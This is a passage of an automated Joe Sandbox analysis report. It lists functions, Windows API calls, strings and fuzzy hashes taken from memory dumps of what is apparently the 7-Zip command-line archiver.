Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: ErrorFileLastSecurity
String ID:
API String ID: 555121230-0
Opcode ID: 4264c5047130bf6628e170ce92b62f2488e22dc27d517a212768e73cfea52f87
Instruction ID: 2214b410b3621b73b49a612a499ec27093551c6aa743e68fed78f93a15686223
Opcode Fuzzy Hash: 4264c5047130bf6628e170ce92b62f2488e22dc27d517a212768e73cfea52f87
Instruction Fuzzy Hash: AB416333304A949ACB60DF2AE84476973AAF384B94F594135DF6A47724EF34C886C751

Function 009AE580 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009AE5C5
free.MSVCRT ref: 009AE669

Strings

#, xrefs: 009AE677

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID: #
API String ID: 1294909896-1885708031
Opcode ID: b0f2d60c1820faef58548d21b8c4e06079b1368b0e0d09608c7fde7dbc05df21
Instruction ID: e659fcedc7cfe85dbf5b61db94e387da3f9026ac493133534cfc7c0b0ecc944a
Opcode Fuzzy Hash: b0f2d60c1820faef58548d21b8c4e06079b1368b0e0d09608c7fde7dbc05df21
Instruction Fuzzy Hash: 7231B423218A9481CB20DF15D94065EA764F7D57E4F544A25FF9F4B764CE39C882C740

Function 00973CBC Relevance: 7.6, APIs: 5, Instructions: 94COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,?,FFFFFFFF,?,?,?,00973E32), ref: 00973D18
GetLastError.KERNEL32(?,?,?,FFFFFFFF,?,?,?,00973E32), ref: 00973D25
_CxxThrowException.MSVCRT ref: 00973D4E
WideCharToMultiByte.KERNEL32(?,?,?,FFFFFFFF,?,?,?,00973E32), ref: 00973DC1
_CxxThrowException.MSVCRT ref: 00973DFA

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: ByteCharExceptionMultiThrowWide$ErrorLast
String ID:
API String ID: 2296236218-0
Opcode ID: a638d3b70a987569a11810fe08a21e1709710d38c6574b86da1fec5f089001b5
Instruction ID: c09e5690c5cc24191cb71a812c1b5bf412be3873698cc086d76f57b97eab8236
Opcode Fuzzy Hash: a638d3b70a987569a11810fe08a21e1709710d38c6574b86da1fec5f089001b5
Instruction Fuzzy Hash: DB31D273704BC59ADB30CF25E48435EBBA9F785B94F54C121DA8963B24DB38C981D741

Function 009B7080 Relevance: 7.6, APIs: 6, Instructions: 77COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009B70EC
free.MSVCRT ref: 009B70F4
free.MSVCRT ref: 009B7101
free.MSVCRT ref: 009B712E
free.MSVCRT ref: 009B7136
free.MSVCRT ref: 009B7143

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: b578af894f36024e1f437a4cb75a0fc809cf4cc32df710a6eb33f0fd421a2ea5
Instruction ID: 23449de5cfb9b61fd196aadcbcc488f14f27e090cb6a8055402a6714e244621e
Opcode Fuzzy Hash: b578af894f36024e1f437a4cb75a0fc809cf4cc32df710a6eb33f0fd421a2ea5
Instruction Fuzzy Hash: 78213D67716A4085CB25AF76D550369A324FBC5FA8F698322DF2D1B798CF35C801C320

Function 00976778 Relevance: 7.6, APIs: 5, Instructions: 74filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 009767D5
CreateFileW.KERNEL32 ref: 00976831
free.MSVCRT ref: 0097683F
SetFileTime.KERNEL32 ref: 00976856
CloseHandle.KERNEL32 ref: 00976864

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: File$Create$CloseHandleTimefree
String ID:
API String ID: 234454789-0
Opcode ID: 2c2437ba34a7087855f8770e7a2108f964c72db211cbb1ecc9a6ff53a80baa42
Instruction ID: a226383c6b5077682a5e4a8177b599b1236969881151006f5689fa9a3b301d4e
Opcode Fuzzy Hash: 2c2437ba34a7087855f8770e7a2108f964c72db211cbb1ecc9a6ff53a80baa42
Instruction Fuzzy Hash: 3721873320454086D6209F1AFD5475A7725F385BF8F548321EE7947BD4CB39C98AD741

Function 0099BF88 Relevance: 7.6, APIs: 6, Instructions: 70COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 0099BFB3
memcmp.MSVCRT ref: 0099BFD1
memcmp.MSVCRT ref: 0099BFE7

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 1ace886e5cc3e700f187fce602ca08dcd48d7174a31f1a447d5d23bb38321506
Instruction ID: 56017f73c386039106b09c144631d6e6e2dbe9e2ec328b9b8a9f093cc4b00f6d
Opcode Fuzzy Hash: 1ace886e5cc3e700f187fce602ca08dcd48d7174a31f1a447d5d23bb38321506
Instruction Fuzzy Hash: 6B117CE130974191EF049F2E9E523E92369DB49FD4F945825DE0A8B207EF78CE46D305

Function 00998290 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 0097B544: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,Path64,009982CA), ref: 0097B56F

Part of subcall function 0097B45C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0097B4AA
Part of subcall function 0097B45C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0097B4F8

free.MSVCRT ref: 00998343

Part of subcall function 00973404: free.MSVCRT ref: 00973431
Part of subcall function 00973404: memmove.MSVCRT ref: 0097344C

Part of subcall function 00978624: free.MSVCRT ref: 009786A9

free.MSVCRT ref: 0099832B
free.MSVCRT ref: 00998336

Strings

Software\7-zip, xrefs: 009982B7
7z.dll, xrefs: 00998307

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$QueryValue$Openmemmove
String ID: 7z.dll$Software\7-zip
API String ID: 2771487249-1558686312
Opcode ID: 232e922c7f0ce51f826d985996c137ff839169f93ea0f5e4105b3c8395333e57
Instruction ID: 4a40bc855a3f9d5524c0b5c8139c802b9a39c989e53147e642707ef057425e92
Opcode Fuzzy Hash: 232e922c7f0ce51f826d985996c137ff839169f93ea0f5e4105b3c8395333e57
Instruction Fuzzy Hash: D6118A5334898050CE20EB22D9513EF6724EBD6BE4FC49211BD5D477A6DF28C64AC700

Function 009B225C Relevance: 7.6, APIs: 5, Instructions: 52COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009B2281
fputs.MSVCRT ref: 009B22B7
free.MSVCRT ref: 009B22C3
fputs.MSVCRT ref: 009B22D9
fputs.MSVCRT ref: 009B2303

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs$free
String ID:
API String ID: 3873070119-0
Opcode ID: 195860d1492bba094a57b9ecf7c7289ce8bcd6229381cd4e357f1d334659de32
Instruction ID: 0a20b5ed244b33e74f1243c52c69b686a893f01e0ad7aedcae6869a1e3a33d3e
Opcode Fuzzy Hash: 195860d1492bba094a57b9ecf7c7289ce8bcd6229381cd4e357f1d334659de32
Instruction Fuzzy Hash: 04112B6322494592DB20DB2AE95476E7330F7D9BE4F408221EFAE87AA5DF28C945C700

Function 00976C84 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32 ref: 00976CA8
GetLastError.KERNEL32 ref: 00976CB6
CreateDirectoryW.KERNEL32 ref: 00976CF1
free.MSVCRT ref: 00976D01
free.MSVCRT ref: 00976D0F

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: CreateDirectoryfree$ErrorLast
String ID:
API String ID: 3252411863-0
Opcode ID: fc7c84208e05cc916470f72eeea78ecee52ed3ec44cc2f5207f8f15f03265912
Instruction ID: 950d72d8d00507fa7dbb6fae84423fb1a08e20a5d6a3de18a6158125b8b3fc5a
Opcode Fuzzy Hash: fc7c84208e05cc916470f72eeea78ecee52ed3ec44cc2f5207f8f15f03265912
Instruction Fuzzy Hash: 95016723318A4081DA34DB66EE9433D6365EBC67F4F58C220DA6D877E5DF18C94AD710

Function 009A056F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009A0574
free.MSVCRT ref: 009A0598
free.MSVCRT ref: 009A05A1
free.MSVCRT ref: 009A05AA
free.MSVCRT ref: 009A05B5
free.MSVCRT ref: 009A2D73

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 4cc3be562f800f66c890074482ac147a4380dffb5d2304e0dd1a317519950c51
Instruction ID: 04840431bd6401d874bbc2f70d5be2f132e976cb07bebd45245dd473f160be93
Opcode Fuzzy Hash: 4cc3be562f800f66c890074482ac147a4380dffb5d2304e0dd1a317519950c51
Instruction Fuzzy Hash: 35F0DA6366A50442CA15FF37E46172E5311B7C7F91F81A862AF0E57711DE38C487C714

Function 0097EC90 Relevance: 7.5, APIs: 6, Instructions: 19COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0097EC9D
free.MSVCRT ref: 0097ECA6
free.MSVCRT ref: 0097ECAF
free.MSVCRT ref: 0097ECB8
free.MSVCRT ref: 0097ECC1
free.MSVCRT ref: 0097ECCA

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 76439c2ae6d2279247935120ce8afe15d695928ca0b2e8dcd2c70b0a6abef4e1
Instruction ID: f224bc2d97b907d1c124282abd12579a9c9b46fbbbcdb5300bc9996069bbd51f
Opcode Fuzzy Hash: 76439c2ae6d2279247935120ce8afe15d695928ca0b2e8dcd2c70b0a6abef4e1
Instruction Fuzzy Hash: 0BE0F56363840481CB14FF77DCA212C2324FBD5F8875494519F2E8B325CD24C852C3A4

Function 009B24B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 110COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009B25EC
fputs.MSVCRT ref: 009B2636

Part of subcall function 009BB1C8: memset.MSVCRT ref: 009BB20D
Part of subcall function 009BB1C8: fputs.MSVCRT ref: 009BB232

Strings

Size, xrefs: 009B25A3
Name, xrefs: 009B2612

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs$freememset
String ID: Name$Size
API String ID: 2276422817-481755742
Opcode ID: eadf18be6b312c5b5e1de07ee489d0b3ab3b1ff87b37fbe43ef131a6c7ee7c31
Instruction ID: 8500741ab9e4211f05c70e431603777d4cc80ab7ab77165af1ba3f621912c2d0
Opcode Fuzzy Hash: eadf18be6b312c5b5e1de07ee489d0b3ab3b1ff87b37fbe43ef131a6c7ee7c31
Instruction Fuzzy Hash: 4841B573224684E2DB26DF34E5547DE2724F784B68F849122EB5E46291DFB8C946C300

Function 009BBD5C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 82COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009BBDCD
fputs.MSVCRT ref: 009BBE0B

Part of subcall function 009BB1C8: memset.MSVCRT ref: 009BB20D
Part of subcall function 009BB1C8: fputs.MSVCRT ref: 009BB232

Strings

: Removing files after including to archive, xrefs: 009BBDC6
Removing, xrefs: 009BBDDB, 009BBEA5

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs$memset
String ID: : Removing files after including to archive$Removing
API String ID: 3543874852-1218467041
Opcode ID: f313436687fa66b8265a09a25303336257e01bcf81b9bc681d1f23b01fb39c8c
Instruction ID: 4cce57a07ce8a29a0ce53edb31b082cb39c5a514ffbf1fa581fc10a43c9f66d6
Opcode Fuzzy Hash: f313436687fa66b8265a09a25303336257e01bcf81b9bc681d1f23b01fb39c8c
Instruction Fuzzy Hash: D4318363600A8592DE79DB35E9953EE6364E780794F48D422CB9F462A1DFBCD4CAC300

Function 009BC47C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009BC4FD
fputs.MSVCRT ref: 009BC50D
free.MSVCRT ref: 009BC553

Part of subcall function 009BB1C8: memset.MSVCRT ref: 009BB20D
Part of subcall function 009BB1C8: fputs.MSVCRT ref: 009BB232

Strings

: , xrefs: 009BC506

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs$freememset
String ID: :
API String ID: 2276422817-3653984579
Opcode ID: 2d51f8118dbba9063f6913f1af84da5abfe4bad0c8c255e5030384decc0f2edb
Instruction ID: f634c7e32ca087824df1689ac4e47655e510f8a6e4bdfa59c35a570c233fcfc0
Opcode Fuzzy Hash: 2d51f8118dbba9063f6913f1af84da5abfe4bad0c8c255e5030384decc0f2edb
Instruction Fuzzy Hash: 2F117F53350A4291DB28EB35D9643AD6321FBC5BF4F488231EA2E477A6DF28D4558340

Function 009BB864 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009BB8EB
free.MSVCRT ref: 009BB90A

Part of subcall function 009BB1C8: memset.MSVCRT ref: 009BB20D
Part of subcall function 009BB1C8: fputs.MSVCRT ref: 009BB232

Strings

ERROR: , xrefs: 009BB8DA
WARNING: , xrefs: 009BB8D3

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs$freememset
String ID: ERROR: $WARNING:
API String ID: 2276422817-2114518728
Opcode ID: 8e3bba8349f46928f641cc6bcc1daefcf3e0a2bdec40cb1967d92b4bec262380
Instruction ID: 3343ad715f334b8e6dd293da4ada9a977c4b5be9951982bbb581f4433f5ec10e
Opcode Fuzzy Hash: 8e3bba8349f46928f641cc6bcc1daefcf3e0a2bdec40cb1967d92b4bec262380
Instruction Fuzzy Hash: 6B116013711A8041DA28EB22E9557AE6311F7C5BE4F488222EF6F0B391DF6CC485C300

Function 009B10C4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 009B10EB
fputs.MSVCRT ref: 009B1153
LeaveCriticalSection.KERNEL32 ref: 009B118D

Strings

ERROR: , xrefs: 009B114C

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: CriticalSection$EnterLeavefputs
String ID: ERROR:
API String ID: 4171338575-977468659
Opcode ID: be048cf6878443a2184a7b989802cb390b223653ec2da76719a795addb1c1f7a
Instruction ID: d36ff9bb0c538c7a9553de0fea4eac39da4ed2735872aff92d6305b7302a3ab2
Opcode Fuzzy Hash: be048cf6878443a2184a7b989802cb390b223653ec2da76719a795addb1c1f7a
Instruction Fuzzy Hash: 2F119D7235598185DB15DF39EE647E82361EB85FA4F588332DF6E4B2A5CF388444C310

Function 009BBB9C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009BBC6C
free.MSVCRT ref: 009BBC78

Part of subcall function 009BB1C8: memset.MSVCRT ref: 009BB20D
Part of subcall function 009BB1C8: fputs.MSVCRT ref: 009BB232

Strings

Archive size: , xrefs: 009BBC29
Files read from disk, xrefs: 009BBBEE

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs$freememset
String ID: Archive size: $Files read from disk
API String ID: 2276422817-3736835528
Opcode ID: 2efab2b554c4f96bbbe87714b73d16ad6655604f82f8fcc69e920b2b3405c337
Instruction ID: a37e35b43f73bc9f8a8b0988867f54133091ce86984e243942ab69e1a27b79f2
Opcode Fuzzy Hash: 2efab2b554c4f96bbbe87714b73d16ad6655604f82f8fcc69e920b2b3405c337
Instruction Fuzzy Hash: 3A11306321494191DF30EF25E89139D6730FBC47E8F849622E65E4B6B9DF68C68AC710

Function 00972974 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50COMMON

Download Yara Rule

Strings

z, xrefs: 009729C0
a, xrefs: 009729BA

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID:
String ID: a$z
API String ID: 0-4151050625
Opcode ID: 79b007a773469842fcff8db7cb0bfa3ab41b08846dae76e5ae68771568f84890
Instruction ID: b8ddbd12843945f83ac5d2efb2b56231a381007f7696e515713145652db78141
Opcode Fuzzy Hash: 79b007a773469842fcff8db7cb0bfa3ab41b08846dae76e5ae68771568f84890
Instruction Fuzzy Hash: D301AF17F2119AD5EB347B21AB543F8A256A715FA1F8DC1338F8D07711E1294AD2E305

Function 0097AD0C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0097AD1C
GetProcAddress.KERNEL32 ref: 0097AD37

Strings

ntdll.dll, xrefs: 0097AD15
RtlGetVersion, xrefs: 0097AD2D

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: RtlGetVersion$ntdll.dll
API String ID: 1646373207-1489217083
Opcode ID: 4b5a8e6a765e93aad0567a887158774fb9c1889fb27dd6c52aa472cf121c010a
Instruction ID: a7f3feba60696b9e383ac29468efce36f01c36e9fc22f137bd72645c0ba760fc
Opcode Fuzzy Hash: 4b5a8e6a765e93aad0567a887158774fb9c1889fb27dd6c52aa472cf121c010a
Instruction Fuzzy Hash: D3F04937715604CADF34DB60F9A43AD73A4ABC8366F444835E65E42AE0DB3CDA88CA05

Function 009BBAAC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009BBACF
fputs.MSVCRT ref: 009BBAFC

Part of subcall function 00972320: free.MSVCRT ref: 0097237E
Part of subcall function 00972320: fputs.MSVCRT ref: 009723B8
Part of subcall function 00972320: free.MSVCRT ref: 009723C4

Strings

StdOut, xrefs: 009BBAF2
Open archive: , xrefs: 009BBAC8

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs$free
String ID: Open archive: $StdOut
API String ID: 3873070119-2401103298
Opcode ID: ce59a64c16b32fbdc4fabaafe929a8674e998fc0354dffc2ed294dc1c66bfb13
Instruction ID: bf2e08828e67a9c02ba74ed72ccd5e9e5ea114c420d72d85b4641de41c6e3de2
